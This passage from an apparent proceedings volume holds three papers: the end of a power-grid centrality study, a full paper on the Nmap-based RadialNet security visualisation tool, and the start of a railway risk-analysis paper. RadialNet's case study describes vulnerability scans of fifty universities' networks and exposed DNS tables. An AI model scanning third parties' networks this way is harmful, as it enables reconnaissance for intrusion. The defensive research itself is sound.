The ranks and values of the degree centrality measures, from both the topological and the reliability points of view, are presented in columns 2 and 3 of Table 2 and in Figure 3. As defined by (1) and (7), the most important nodes from a degree centrality point of view have the largest number of connections to other nodes in the network (topological case) and also the most reliable ones (reliability case). Thus, node 4, characterized by the largest number of incident edges (five), is correctly placed in the first position of the topological rank, and it keeps that position when the arc reliabilities are taken into account. On the contrary, nodes 2 and 5 (four incident edges), in second position from a topological point of view, drop to the sixth and fifth positions of the reliability ranking, respectively, because some of their connections are characterized by the highest values of the failure rates (1.0858 occ/yr), which contribute little to the numerator of (7). Interestingly, node 7, with only three connections, gains the fourth position in the reliability rank thanks to the very low failure rates of those connections (0.0105 occ/yr).
3.2 Closeness Centrality Measures (C^C and RC^C)
The ranks and values of the closeness centrality measures, from both the topological and the reliability points of view, are presented in columns 4 and 5 of Table 2 and in Figure 4.
Fig. 3. Topological and Reliability Degree Centrality, C^D and RC^D
Fig. 4. Topological and Reliability Closeness Centrality, C^C and RC^C
Node 4 again turns out to be the most important, from both the topological and the reliability points of view, because the shortest topological and reliability paths connecting it to all the other nodes are, on average, shorter than those starting from any other node (2). In general, the topological and reliability ranks do not present significant differences, except for node 2 which, despite its four incident edges, drops from the fifth to the tenth position. This is mainly due to the fact that it belongs to the less reliable subgraph of the network (the connections between nodes 1, 2, 3, 4 and 5) with no direct edges connecting it to the most reliable subgraph (as have, for example, nodes 4 and 5); thus, the reliability shortest
paths connecting node 2 to all the other nodes either are characterized by large values of the failure rates or result from more tortuous paths involving several edges: in both cases, the large distances rd_2j lead to a relatively low value of RC^C. In this regard, note that nodes 1 and 3, which belong to the same subgraph as node 2 but have even fewer incident edges, occupy the last two positions in the reliability ranking.
3.3 Betweenness Centrality Measures (C^B and RC^B)
The ranks and values of the betweenness centrality measures, from both the topological and the reliability points of view, are presented in columns 6 and 7 of Table 2 and in Figure 5. As defined by (3), betweenness centrality assigns more importance to a node if it lies on a larger number of shortest paths connecting pairs of nodes, from both the topological and the reliability points of view. In the topological rank, node 4 is again the most important since it bridges the lower and upper parts of the graph, similarly to nodes 5, 6 and 9, which in fact occupy the next three positions. These nodes 'naturally' constitute a shortcut between the two regions of the network and are thus involved in the majority of the shortest paths between two generic nodes i and j. When the reliability of the connections is taken into account, nodes 4 and 5 plummet to the seventh and tenth positions, respectively, whereas nodes 6 and 9 occupy the first and second positions: this is because nodes 4 and 5 (respectively 6 and 9) are located in the least (most) reliable subgraph, and thus on average probably belong to low (high) reliability geodesic paths.
Fig. 5. Topological and Reliability Betweenness Centrality, C^B and RC^B
3.4 Information Centrality Measures (C^I and RC^I)
The ranks and values of the information centrality measures, from both the topological and the reliability points of view, are presented in columns 8 and 9 of Table 2 and in Figure 6. Node 4 is the most important from a topological point of view, which means that its removal yields the largest drop in the network efficiency (see (5)). As already highlighted for C^B and RC^B, node 4, similarly to nodes 5, 6 and 9, bridges two otherwise separated regions of the network. The removal of such nodes yields a large increase in the average shortest path lengths, thus appreciably affecting the network efficiency. When the reliability of the connections is taken into account, node 4 drops to the third position, because three of its five connections are characterized by very large failure rates (λ_4j = 1.0858 occ/yr, j = 2, 3, 5): this implies that the shortest paths starting from it and connecting the remaining nodes are likely to be strongly influenced at least by these first unreliable edges and, consequently, so is the global efficiency. On the contrary, nodes 7 and 9 are characterized by very low connection failure rates and are thus, for the opposite reasons, in the first and second positions of the reliability rank, respectively. Notice that node 7 ranks second in the topological analysis, although only three edges depart from it, because its removal also implies the removal of node 8 and of all the shortest paths in the d_ij matrix originating from it. Another interesting case is that of node 8, which is the least important from a topological point of view and, despite its single incident edge, gains the tenth position in the reliability information centrality rank, because its connection is a highly reliable one (λ_87 = 0.0105 occ/yr).
Fig. 6. Topological and Reliability Information Centrality, C^I and RC^I
Summarizing, node 4 is the most important for almost all centrality measures, except for the reliability information centrality, due to its three low-reliability
connections, and for the reliability betweenness centrality, due to the fact that it bridges the two parts of the network characterized by different reliabilities while belonging to the less reliable subgraph. Node 9 is instead solidly in the second position of all ranks (except for the third position in the topological information centrality) and does not suffer from the same problem as node 4, being part of the highly reliable subgraph. It is worth noticing that node 7, despite its peripheral position and its intermediate rank in three centrality measures, gains the second and first positions in the topological and reliability information centrality ranks, respectively, due to its highly reliable edges and to the fact that it connects the otherwise isolated node 8 to the rest of the network. Node 8 is always last, except in the reliability information centrality and reliability closeness centrality, which recognize its highly reliable edge. Thus, the analysis i) confirms the intuitive necessity of increasing the protection of nodes 4, 5, 6 and 9 against malevolent attacks, since these nodes are responsible for connecting two different areas of the network, and ii) suggests taking a similar action for node 7, which may not be so obvious. As a final remark, note that even in a simple network like the one under analysis, the new centrality measures accounting for the reliabilities lead to rankings of the nodes which differ significantly from those obtained by a purely topological analysis. In the case analyzed, the number of nodes whose rank changes by at least two positions is 3/14 (21%) for the degree centralities, 5/14 (36%) for the closeness centralities, 8/14 (57%) for the betweenness centralities and 6/14 (43%) for the information centralities.
4 Conclusions
In this paper, the topological concepts of centrality measures have been extended to account for the reliability of the network connections. The indications derived from the topological and the reliability centrality measures have been compared with respect to the importance of the nodes of the IEEE 14 BUS power transmission network system. Each piece of equipment of the system has been transposed into a node or edge of the representative network, and the topological and reliability centrality measures have been computed. The reliability measures have been shown capable of highlighting some network safety strengths and weaknesses otherwise not detectable on a purely topological basis. In this view, the reliability centrality measures may constitute a valuable additional tool for network designers and managers to gain insights on system robustness.
Acknowledgements

This work has been partially funded by the Fondation pour une Culture de Sécurité Industrielle of Toulouse, France, under research contract AO2006-01.
References

1. Nieminen, J.: On Centrality in a Graph. Scandinavian Journal of Psychology 15, 322–336 (1974)
2. Freeman, L.C.: Centrality in Social Networks: Conceptual Clarification. Social Networks 1, 215–239 (1979)
3. Sabidussi, G.: The Centrality Index of a Graph. Psychometrika 31, 581–603 (1966)
4. Wasserman, S., Faust, K.: Social Network Analysis. Cambridge U.P., Cambridge (1994)
5. Latora, V., Marchiori, M.: A Measure of Centrality Based on the Network Efficiency. New Journal of Physics 9, 188 (2007)
6. The IEEE 14 BUS data can be found at http://www.ee.washington.edu/research/pstca/
7. Floyd, R.W.: Algorithm 97: shortest path. Communications of the ACM 5(6), 345 (1962)
8. Fortunato, S., Latora, V., Marchiori, M.: Method to find community structures based on information centrality. Physical Review E 70, 056104 (2004)
9. Latora, V., Marchiori, M.: Efficient Behavior of Small-World Networks. Physical Review Letters 87(19) (2001)
10. Zio, E.: From Complexity Science to Reliability Efficiency: A New Way of Looking at Complex Network Systems and Critical Infrastructures. Int. J. Critical Infrastructures 3(3/4), 488–508 (2007)
11. Pajek program for large network analysis, http://vlado.fmf.uni-lj.si/pub/networks/pajek/
12. Billinton, R., Li, W.: Reliability Assessment of Electric Power Systems Using Monte Carlo Methods, pp. 19–20 (1994)
RadialNet: An Interactive Network Topology Visualization Tool with Visual Auditing Support

João P.S. Medeiros¹ and Selan R. dos Santos²

¹ Department of Computer Engineering and Automation, Federal University of Rio Grande do Norte, 59078-970, Natal/RN, Brazil
[email protected]
² Department of Informatics and Applied Mathematics, Federal University of Rio Grande do Norte, 59078-970, Natal/RN, Brazil
[email protected]

Abstract. The pervasive aspect of the Internet increases the demand for tools that support both monitoring and auditing of security aspects in computer networks. Ideally, these tools should provide a clear and objective presentation of security data in such a way as to let network administrators detect or even predict network security breaches. However, most of these data are still presented only in raw text form, or through inadequate data presentation techniques. Our work tackles this problem by designing and developing a powerful tool that integrates several information visualization techniques in an effective and expressive visualization. We have tested our tool in the context of network security, presenting two case studies that demonstrate important features such as scalability and detection of critical network security issues.
1 Introduction

The world's reliance on the Internet and its evident vulnerability require a global effort to protect it against malicious uses and many forms of attacks. However, networks have remained a challenge for information retrieval and visualization because of the rich set of tasks that users want to perform and the complexity of the network data. Furthermore, most of the existing visual tools focus their attention solely on the visual representation of a network's topology, failing to couple this view with other relevant network data. A visual tool that offers an integrated view of a network's topology and its security aspects in the same visualization is a great asset for network monitoring. An acceptable solution for this sort of problem should meet the following requirements: i) be able to represent a network with a large number (at least hundreds) of nodes; ii) provide mechanisms to navigate the information or the network's topology; iii) afford a simple visual representation that displays all the data simultaneously; and iv) offer solutions to or completely avoid the data occlusion problem. Based on these requirements, we propose an interactive graphics application, called RadialNet, to assist the tasks of identifying security problems, locating available network services, monitoring network metrics, alerting on potential security breaches, and improving network configuration.
For that purpose, we enable users to manipulate and visualize the network data in a dynamic and contextualized fashion. In the next section we briefly describe some related work, highlighting the limitations and issues that drove our work. Next, in Section 3, we describe the data used in the case studies and their origin. We introduce RadialNet in Section 4, providing implementation details. Section 5 presents a conceptual background on visualization, focusing on the methodology used in the development of our tool. Two case studies regarding security monitoring and scalability limits of our tool are discussed in Section 6. Finally, the concluding remarks are found in Section 7.
2 Related Work

There exist numerous tools for computer network management that provide some way of monitoring or assessing the network's configuration, services, and underlying topology. In general, they all offer some form of graphic representation of data, but they rarely go beyond the usual display of logical connections between hosts. The tools fe3d [1] and nagios [2] are exceptions to this trend and have provided meaningful data picturing for network monitoring. Cheops-ng [3] is another commonly referenced network visualization tool, but it does not rely on a formal data visualization technique to draw the network topology. The fe3d project is based on the three-dimensional cone tree visualization technique [4]. Cone tree is essentially a hierarchical technique, so it does not handle well cyclic graphs, which is the model associated with a computer network. Furthermore, the cone tree technique faces the problem of information occlusion caused by the use of the depth dimension, a problem often found in three-dimensional representations of data [5]. The goal of fe3d is to generate visualizations of the services, network devices, and operating systems installed on each of the network's hosts. Nagios employs the radial layout visualization technique, commonly used in tree drawing [6]. Unlike cone tree, the radial positioning is capable of representing graphs with cycles, as long as there are just a few interconnections between cycles. The goal of nagios is to offer visualizations that help computer network management tasks. Another group of related work centers its effort on intrusion detection [7]. This task typically involves the use of a mechanism that examines user activity logs to identify suspicious or anomalous behavior that may indicate an attack. The work done by Muelder et al. [8], for instance, proposes the use of a port-based visualization system that helps in sifting through large amounts of data corresponding to port scans. The rationale of their work is to rely on the visual-analytics skills of a viewer to detect intrusion and improve data mining approaches. The main difference between this approach and ours is the fact that we focus on the investigation of a network infrastructure to detect insecure configurations and represent this information in a simple and interactive visual metaphor, whereas they follow a visual data mining approach applied to (multivariate) log data, communicating their findings through several types of (often complex) visual representations that need to be coordinated and integrated by the user. The lessons learned from the analysis and comparison of several visual tools helped us define some guidelines and set requirements (cf. Section 1) that guided us
during the design of our solution. For instance, it is important for a tool to support a high level of interaction in order to aid the task of network monitoring. Also, the visual metaphor should reflect the dynamic aspect of both the network and its related data, be able to support content navigation, and be simple enough to allow administrators to rapidly grasp the meaning of the representation. Lastly, we have noticed that most of the tools are limited to the presentation of a few dozen nodes because of the insufficient screen space available or due to occlusion issues. Therefore, our main motivation was to create an effective visual tool to deal with the problem of visualizing more than just the network topology. The solution proposed in this work aims at harnessing the power of visualization to integrate security and auditing data with the network's underlying topology, following an interactive approach that enables content navigation.
3 Aspects of Network Security

Visualization of security data from computer networks is an emerging area that brings its own challenges and idiosyncrasies [9]. To obtain security data from a network we employed Nmap [10], which can accomplish the following:

1. Detect network devices like routers, switches, wireless access points, and firewalls;
2. Detect the remote operating system (OS fingerprinting);
3. Discover services (e.g. FTP, DNS, HTTP, etc.);
4. Provide a script engine to explore services;
5. Probe paths that data packets take through the network (traceroute); and
6. Determine link latency and route disruption.
We use items 1 to 4 to acquire data on the network hosts and to probe the available services, while items 5 and 6 provide us with topology information and link latency. With these data in hand we are able to execute tasks such as topology discovery, vulnerability assessment scans, inventory determination, detection of forbidden devices, and detection of unauthorized services. These tasks are valuable assets in helping administrators identify hosts or sub-networks with problems within, say, the Internet. Basically, the results acquired with Nmap make it possible to determine the inventory of a network and its topology. Yet, to make sense of the network problems and security issues discovered with Nmap, we decided to relate our findings to a vulnerability database. Establishing such a relation provides a means to measure and quantify the network security status. In our case we did this by cross-referencing our data with the database from the National Institute of Standards and Technology, known as the National Vulnerability Database (NVD) [11]. The NVD comprises a set of XML files that describe known security problems. We have created a relational database that combines data from the Nmap scans with the NVD files.
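The sketch below illustrates the cross-referencing step in Python. The Nmap XML element and attribute names used here ('host', 'address', 'port', 'state', 'service') are part of Nmap's real output format, while the lookup callable `nvd_lookup` is a hypothetical stand-in for a query against the relational database described above.

import xml.etree.ElementTree as ET

def hosts_with_vulnerabilities(nmap_xml_path, nvd_lookup):
    """Yield (address, open ports, matched NVD entries) per scanned host."""
    root = ET.parse(nmap_xml_path).getroot()
    for host in root.iter('host'):
        addr = host.find('address').get('addr')
        open_ports = [p.get('portid') for p in host.iter('port')
                      if p.find('state') is not None
                      and p.find('state').get('state') == 'open']
        vulns = [nvd_lookup(s.get('name'), s.get('product'), s.get('version'))
                 for s in host.iter('service')]
        yield addr, open_ports, vulns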
4 The RadialNet

RadialNet integrates an array of information visualization techniques in an environment that handles any dataset represented with our abstract data model for a network with multivariate data nodes. Figure 1 shows its basic user interface.
Fig. 1. The RadialNet graphical user interface
The tool was developed with Python, PyCairo for the graphics rendering, and PyGTK and PyGObject to create the user interface [12]. To implement data tables we used Python dictionaries. The NVD XML files were stored in a relational database.
5 RadialNet Visualization Aspects

The mapping of data in its original form into an abstract graphic representation was done in accordance with the reference model for visualization introduced by Card et al. [13]. The model comprises three chained data transformations, as shown in Figure 2. In the first transformation the raw data originates data tables, organized by variable types (i.e. nominal, ordinal, and quantitative). The second transformation maps the data tables to visual structures through an association between variable types and retinal variables [14]. The last transformation involves the application of view transformations on the visual structures to create new improved views.
Fig. 2. Card et al. reference model for visualization (adapted from [13])
For all three transformations the human interaction is critical, being responsible for fine-tuning the visualization to accomplish the intended analytic task. Next, we examine all three transformations in the context of computer network security and auditing.

5.1 Data Transformation

The main source of raw data is the output of Nmap, which is a fairly complex XML file. We have extracted some of the fields and used them to query the NVD and retrieve, for instance, operating system version and vendor. Based on these data, we assign a vulnerability level to each host. Table 1 is a simplified version of a data table created from an XML output file resulting from a Nmap scan.

Table 1. Data fields classified by variable type: (N)ominal, (O)rdinal, (Q)uantitative

Field          | Category | Data items
Host           | N        | 192.168.0.1  | 192.168.0.2
State          | N        | up           | up
Reason         | N        | reset        | echo-reply
Addrtype       | N        | ipv4         | ipv4
Hostname       | N        | example1.edu | example3.edu
Security level | O        | S            | I
Uptime         | Q        | 210          | 1021
5.2 Visual Mapping

There are many choices of visual mapping that can be used to represent a data table. However, for a mapping to be expressive it must represent graphically all the items from the data table [15]. The issue of how well a mapping affords fast interpretation or conveys more distinction among visual marks is called effectiveness [15]. Because effectiveness is inherently subjective and difficult to measure [16,17], we decided to give the user control over the visual mapping process. Therefore, RadialNet provides an interface component for the data table that allows the viewer to change the suggested mapping between data table items and visual structures (i.e. visual marks + graphical properties). A node-link diagram has been chosen to represent the network topology. The nodes are arranged according to the radial layout [6], since this two-dimensional visualization technique is quite suitable for networks. This layout places nodes on concentric rings according to their depth in the tree; a subtree is then laid out over a sector of the ring associated with the subtree's root. These sectors usually do not overlap. Although the radial layout is not an ideal representation for cyclic graphs, we have adapted it so that it accommodates cycles and still preserves an appealing appearance. Besides, this representation helps convey the typical tree-like hierarchical organization of a network, which is useful if one wishes to gain an overview of sub-networks and their relations.
Almost all security and auditing data (except the host address) can be mapped to graphic properties such as color, size, and shape. For instance, in the initial visual mapping we suggest that link latency be mapped to edge thickness (the thicker the edge, the greater the latency). Also, the shape of a node (square, circle) indicates the type of device (switches, wireless access points, routers, and general purpose). In addition, the vulnerability level (categorized in three groups) is assigned to three colors: green (secure), yellow (compromised), and red (insecure). Another piece of security-related data, the number of discovered services, is mapped to the size of the visual marker. Extra information can still be encoded when we enable viewers to color the sector's background according to certain query parameters. For example, the viewer might want to highlight parts of the network that support the FTP (File Transfer Protocol) service. Figure 3 presents an example of our initial suggested visual mapping.
Fig. 3. Network visualization following our suggested visual mapping. The bottom square presents icons that may also be associated with a node.
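A small Python sketch of this initial mapping is shown below; the attribute names and scaling constants are illustrative choices of ours, not RadialNet's actual internals.

VULNERABILITY_COLOR = {       # categorized vulnerability level -> color
    'secure': 'green',
    'compromised': 'yellow',
    'insecure': 'red',
}

def node_size(n_services, base=8, step=2):
    """Marker size grows with the number of discovered services."""
    return base + step * n_services

def edge_width(latency_ms, scale=0.5):
    """The thicker the edge, the greater the link latency."""
    return 1.0 + scale * latency_ms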
5.3 View Transformations

View transformations are important because they reflect the dynamic process of visual investigation and should be handled interactively. Navigation in the information space is a typical view transformation task, and may involve animation, zooming, panning, the collapsing of subtrees, or the rearrangement of nodes. Content navigation is done through an interactive rearrangement of nodes controlled by the viewer. By selecting any node other than the one at the center of the rings, the viewer triggers a slow-in/slow-out animation that smoothly moves the selected node to the center of the visualization. The topology as a whole moves accordingly, in such a way as to minimize the crossing of edges, thereby reducing disorientation. The animation is calculated through linear interpolation of the polar coordinates of all nodes [18].
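A minimal sketch of this repositioning follows: each node's polar coordinates are interpolated between the old and the new layout, with an ease-in/ease-out ramp on the time parameter producing the slow-in/slow-out effect. The names are illustrative, not taken from the RadialNet sources.

import math

def ease(t):
    """Slow-in/slow-out ramp for t in [0, 1]."""
    return 0.5 - 0.5 * math.cos(math.pi * t)

def frame(old, new, t):
    """Interpolated polar positions {node: (radius, angle)} at time t."""
    s = ease(t)
    return {n: ((1 - s) * old[n][0] + s * new[n][0],   # radius
                (1 - s) * old[n][1] + s * new[n][1])   # angle
            for n in old}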
The data acquired with Nmap are rich in details that cannot all be exposed to the viewer simultaneously without overwhelming them. The detail-on-demand technique addresses this issue in the following manner: when the user right-clicks on a node, a pop-up window appears and offers details of the scanned data, such as operating system, device type, hostname, uptime, and vulnerability report. Figure 4 provides an example of such a pop-up window showing the services found on host 199.185.137.3 from Figure 3. The bottom window shows, for instance, data collected by the NSE (Nmap Scripting Engine), in this case the entry table of a DNS (Domain Name System) server.
Fig. 4. Pop-up window with detail-on-demand
Strategies to Handle Occlusion

Poor scalability and cluttered views are two known limitations of the node-link diagram representation. To reduce the impact of these limitations on the visualization, we provide three techniques that can be used in isolation or combined: filtering, distortion, and subgraph collapsing. Filtering can be performed on visual attributes (e.g. to hide labels, or turn color shading on/off) or on data ranges (e.g. to set a range of values that should be kept in or removed from the visualization). Figure 5 demonstrates data range filtering in which only the critical nodes (those in red) remain in the visualization. As a result, the filtered view (right image of Figure 5) has more screen space for the network visualization to expand into. Zooming could be used to avoid occlusion, but it might present the side effect of losing context, depending on the degree of zooming used. Focus+context (F+C) techniques tackle this issue by allowing viewers to focus on some detail without losing the context [19]. We use fisheye distortion [20] as our F+C method to alleviate information occlusion. The fisheye focus is placed on a ring and can be expanded and/or moved outwardly, increasing the space between rings. This is done in a continuous fashion, providing a nice visual effect.
Fig. 5. Application of data range filtering on the original view (left image) to keep only critical nodes, shown in red (right image). Nodes on the right image have been automatically rearranged.
The collapsing of subgraphs is the last resort for reducing occlusion, and should be used sparingly because it may cause the viewer to lose context. Nonetheless, the collapsing of subgraphs can be very useful when visualizing networks with hundreds of nodes, as demonstrated in Section 6. This procedure groups an entire subgraph into its root node, chosen by the viewer, as illustrated by the diagram of Figure 6.
Fig. 6. Collapsing a subgraph
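As a hedged sketch (assuming a networkx graph and a directed spanning tree of it, e.g. obtained with nx.bfs_tree from the center node), the collapse of Figure 6 can be expressed as hiding the descendants of the chosen root and remembering them for later expansion:

import networkx as nx

def collapse(G, spanning_tree, root):
    """Hide the subtree below `root`; return (visible view, hidden set)."""
    hidden = nx.descendants(spanning_tree, root)
    view = G.subgraph(n for n in G if n not in hidden).copy()
    return view, hidden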
5.4 Multiple Coordinated Views

A view is a visual representation of the data we wish to visualize. When the data is very complex, many views of the data may be needed to allow users to understand such complexity and, possibly, discover unforeseen relationships. The interaction between these multiple views and their behavior needs to be coordinated to enable users to investigate, explore, or browse the complex data, as well as to let them experiment with different scenarios simultaneously or compare distinct views.
Fig. 7. Brushing through coordinated views: the highlighted region on the left is reflected on the right image, which shows a different view
In our work we have provided a pair of coordinated views with support for two types of coordination: navigation and brushing. The former allows the simultaneous animation of the topology in two views generated with different mappings. For instance, one view may depict a security profile with vulnerability information, whereas the other may represent a management profile of the same network, focusing on available services, types of machine, operating systems, and usage statistics. Rotating or changing the focus in one view yields a corresponding modification in the other. The latter type of coordination, brushing [21], refers to a coupled interaction in which the selection of features in one view is immediately reflected in the other (Figure 7).
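One common way to implement such coupling is a shared selection model that both views observe: a selection made in any view notifies the others, which re-render their highlights. The sketch below shows this observer-style pattern in Python; it is a generic illustration, not the tool's actual architecture.

```python
class SelectionModel:
    """Shared selection state observed by all coordinated views."""

    def __init__(self):
        self._listeners = []
        self.selected = set()

    def subscribe(self, callback):
        self._listeners.append(callback)

    def select(self, nodes):
        # Brushing: a selection made in one view is pushed to every view.
        self.selected = set(nodes)
        for callback in self._listeners:
            callback(self.selected)

model = SelectionModel()
model.subscribe(lambda sel: print("security view highlights:", sel))
model.subscribe(lambda sel: print("management view highlights:", sel))
model.select({"199.185.137.3"})
```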
6 Case Studies
The evaluation process in information visualization is challenging, especially when dealing with complex interfaces [22]. We decided to show evidence of RadialNet's usefulness by describing its application in a case study, while for the scalability issue we generated two artificial network datasets.

6.1 Scanning 50 Universities
In this first application we executed security and vulnerability assessment scans over fifty universities on the Internet. For obvious reasons we have omitted the addresses and host names. Figure 8 presents a basic visualization with our suggested visual mapping: machine type → shape, vulnerability → color and size, latency → line thickness, presence of firewalls → icons, missing data → dashed lines, and connections that break the hierarchy → orange lines. Figure 8 shows that 20 hosts have severe security problems (marked in red) and that another 18 hosts (in yellow) are considered fairly insecure. Also, all destination hosts
Fig. 8. Visualization of 50 universities and their vulnerabilities
have their ports filtered (shown by a padlock icon), and five of them (the squares) have been identified as routers: four are wireless access points and the other is a switch. Further analysis done through brushing allowed us to highlight all nodes that have DNS services available. As we can see from Figure 8, only two servers fit the query (one with a red background and the other with a yellow background, both located at the top of Figure 8). In both cases we used detail-on-demand to verify that their address table was accessible, which may be regarded as a severe security breach. Finally, the same visualization can be used to perform a structural assessment of the network. The right-hand portion of Figure 8 shows various alternative connections between nodes (links in orange), showing that a failure in one of these nodes would not compromise data flow. Also, the distribution of nodes on rings facilitates counting the hops between network nodes, and the link thickness makes the network's bottlenecks clear.

6.2 Scalability Tests
To empirically determine RadialNet's scalability we generated artificial networks in which nodes may have 0, 5, 10, or 30 children. These are representative values for, respectively, local networks, small offices, and computer laboratory networks. Notice, for instance, that Figure 8 has 238 nodes in total, which could be visualized without node overlapping or context loss. The left image of Figure 9, a network with 500 nodes, also shows a fairly satisfactory result without node overlapping. In the second simulation, a network with 1000 nodes, the results were not satisfactory, though: the inset of the right image in Figure 9 clearly shows node overlapping. Nevertheless, we can still distinguish visual attributes such as color and shape. We also ran tests on networks with the same number of nodes but with a topology that emphasized depth rather than breadth, in which case the overall results were better.
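A generator for such artificial tree-shaped networks can be sketched as follows. This is an illustrative reconstruction under our own assumptions (uniform choice among the stated fanouts, bounded depth), not the script used in the experiments.

```python
import random

def generate_network(depth, fanouts=(0, 5, 10, 30), seed=1):
    # Build an artificial tree-shaped network: each node receives a child
    # count drawn from values representative of local networks, small
    # offices, and computer laboratory networks.
    random.seed(seed)
    nodes, edges = ["n0"], []
    frontier = [("n0", 0)]
    while frontier:
        node, level = frontier.pop()
        if level >= depth:
            continue
        for _ in range(random.choice(fanouts)):
            child = f"n{len(nodes)}"
            nodes.append(child)
            edges.append((node, child))
            frontier.append((child, level + 1))
    return nodes, edges

nodes, edges = generate_network(depth=3)
print(len(nodes), "nodes,", len(edges), "links")
```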
Fig. 9. Visualization of an artificial network with (left) 500 nodes and (right) 1000 nodes. Note the overlapping nodes in the inset of the right image.
7 Conclusion
In the present work we described RadialNet in terms of an information visualization reference model that maps the data space into multiple coordinated views. We tested our tool in two case studies, focusing on security and scalability aspects. Our motivation was to design an expressive and effective visualization tool which supports the following features: i) the ability to represent networks with hundreds of nodes; ii) the capacity to support information navigation and the recording of the navigation history, which helps in revisiting interesting views; iii) interaction through a simple user interface that encapsulates all the critical information needed to perform security and auditing assessments of networks; and iv) the integration of view transformation techniques to alleviate the occlusion problem found in two-dimensional node-link diagrams. RadialNet started out as a project accepted by the Google Summer of Code 2007 to be the visualization tool for the Nmap and Umit projects, and has been continually evaluated by the open-source community since its release in November 2007. Finally, we recognize that RadialNet does have limitations regarding scalability and would benefit from a more rigorous user study evaluation. Still, the feedback received so far is encouraging and has confirmed our initial motivation: there is still a need for good network visualization tools that are able to integrate rich, multi-valued data with the network's underlying topology in a meaningful and dynamic fashion.
References
1. Sandalski, S.: fe3d, http://projects.icapsid.net/fe3d/
2. Galstad, E.: Nagios, http://www.nagios.org/
3. Priddy, B.: Cheops-ng, http://cheops-ng.sourceforge.net/
4. Robertson, G.G., Mackinlay, J.D., Card, S.K.: Cone trees: animated 3D visualizations of hierarchical information. In: Proceedings of the 1991 SIGCHI Conference on Human Factors in Computing Systems, pp. 189–194. ACM Press, New York (1991)
5. Chalmers, M.: Tutorial: Design and perception in information visualisation. In: 25th International Conference on Very Large Data Bases (1999)
6. Eades, P.: Drawing free trees. Bulletin of the Institute for Combinatorics and its Applications 5, 10–36 (1992)
7. Teoh, S.T., Ma, K.L., Wu, S.F., Jankun-Kelly, T.J.: Detecting flaws and intruders with visual data analysis. IEEE Comput. Graph. Appl. 24(5), 27–35 (2004)
8. Muelder, C., Ma, K.L., Bartoletti, T.: Interactive visualization for network and port scan detection. In: Valdes, A., Zamboni, D. (eds.) RAID 2005. LNCS, vol. 3858, pp. 265–283. Springer, Heidelberg (2006)
9. Conti, G.: Security Data Visualization – Graphical Techniques for Network Analysis, 1st edn. No Starch Press (2007)
10. Fyodor: Nmap, http://www.insecure.org/nmap/
11. NIST: National Vulnerability Database – NVD, http://nvd.nist.gov/
12. Lutz, M.: Programming Python, 3rd edn. O'Reilly Media, Sebastopol (2006)
13. Card, S., Mackinlay, J., Shneiderman, B. (eds.): Readings in Information Visualization: Using Vision to Think. Morgan Kaufmann Publishers, Inc., San Francisco (1999)
14. Bertin, J.: Semiology of Graphics: Diagrams, Networks, Maps. University of Wisconsin Press (1983)
15. Mackinlay, J.: Automating the design of graphical presentations of relational information. ACM Transactions on Graphics 5(2), 110–141 (1986)
16. Frøkjær, E., Hertzum, M., Hornbæk, K.: Measuring usability: are effectiveness, efficiency, and satisfaction really correlated? In: CHI 2000: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, pp. 345–352. ACM, New York (2000)
17. Kosara, R., Healey, C.G., Interrante, V., Laidlaw, D.H., Ware, C.: User studies: Why, how, and when? IEEE Computer Graphics and Applications 23(4), 20–25 (2003)
18. Yee, K.P., Fisher, D., Dhamija, R., Hearst, M.A.: Animated exploration of dynamic graphs with radial layout. In: INFOVIS, pp. 43–50 (2001)
19. Mackinlay, J.D., Robertson, G.G., Card, S.K.: The perspective wall: detail and context smoothly integrated. In: Carroll, J.M., Tanner, P.P. (eds.) Proceedings of the 1987 SIGCHI Conference on Human Factors in Computing Systems and Graphics Interface, pp. 173–179. ACM Press, New York (1987)
20. Furnas, G.W.: The FISHEYE view: A new look at structured files. Technical Report #8111221-9, Bell Labs, Murray Hill, New Jersey 07974, U.S.A. (December 1981)
21. Becker, R., Cleveland, W.: Brushing scatterplots. Technometrics 29(2), 127–142 (1987)
22. Plaisant, C.: The challenge of information visualization evaluation. In: Proceedings of the Working Conference on Advanced Visual Interfaces (AVI 2004), pp. 109–116. ACM Press, New York (2004)
Quantitative Security Risk Assessment and Management for Railway Transportation Infrastructures
Francesco Flammini1,2, Andrea Gaglione2, Nicola Mazzocca2, and Concetta Pragliola1
1 ANSALDO STS - Ansaldo Segnalamento Ferroviario S.p.A., Via Nuova delle Brecce 260, Naples, Italy
{francesco.flammini,concetta.pragliola}@ansaldo-sts.com
2 Universita' di Napoli "Federico II", Dipartimento di Informatica e Sistemistica, Via Claudio 21, Naples, Italy
{frflammi,andrea.gaglione,nicola.mazzocca}@unina.it
Abstract. Scientists have long been investigating procedures, models and tools for risk analysis in several domains, from economics to computer networks. This paper presents a quantitative method and a tool for security risk assessment and management specifically tailored to the context of railway transportation systems, which are exposed to threats ranging from vandalism to terrorism. The method is based on a reference mathematical model and is supported by a specifically developed tool. The tool allows for the management of data, including the attributes of attack scenarios and the effectiveness of protection mechanisms, and for the computation of results, including risk and cost/benefit indices. The main focus is on the design of physical protection systems, but the analysis can be extended to logical threats as well. The cost/benefit analysis allows for the evaluation of the return on investment, which is nowadays an important issue to be addressed by risk analysts.
Keywords: Security, Quantitative Approaches, Risk Analysis, Cost/Benefit Evaluation, Critical Infrastructure Protection, Railways.
1 Introduction
Risk analysis is a central activity in the security assurance of critical railway transportation infrastructures and mass transit systems. In fact, the results of risk analysis are needed to guide the design of surveillance and protection systems [11]. Risk analysis is commonly performed using qualitative approaches, based on expert judgment and limited ranges for risk attributes (e.g., low, average, high) [10]. However, model-based quantitative approaches are more effective in determining the risk indices, by taking into account the frequency of occurrence of threats (e.g., considering historical data) and analytically determining the consequences (damage to assets, service interruption, people injured, etc.). This allows for a fine tuning of the security system in order to optimize the overall investment.
Usually, analysts refer to Risk Assessment as the process of measuring the expected risk as a combination of threat occurrence probability, system vulnerability and expected damage. Risk Management (or mitigation) is instead used to indicate the process of choosing the countermeasures and predicting their impact on risk reduction. The overall process (which can be iterative) is often referred to as risk analysis. While a generally accepted taxonomy does not seem to exist, this is the meaning we will give to these terms in this paper. This paper concentrates on quantitative risk analysis approaches. There are several issues related to the choice of implementing quantitative, analytical or model-based approaches: one is the availability of source data; another is the methodology to be used for the analysis, which is not straightforward. Several approaches to the risk analysis of critical infrastructures are available in the literature (see, e.g., references [1]-[6]), but none seems to precisely fit the specific application, since they are either qualitative, too general (hence abstract), or tailored to different applications. In this paper we present the core of a quantitative framework based on a reference mathematical model (partly derived from [8]) supported by a specifically designed software tool. In particular, we have extended the classical risk equation in order to precisely evaluate the impact on the risk indices of parameters related to protection mechanisms. This makes it possible to balance the investment in 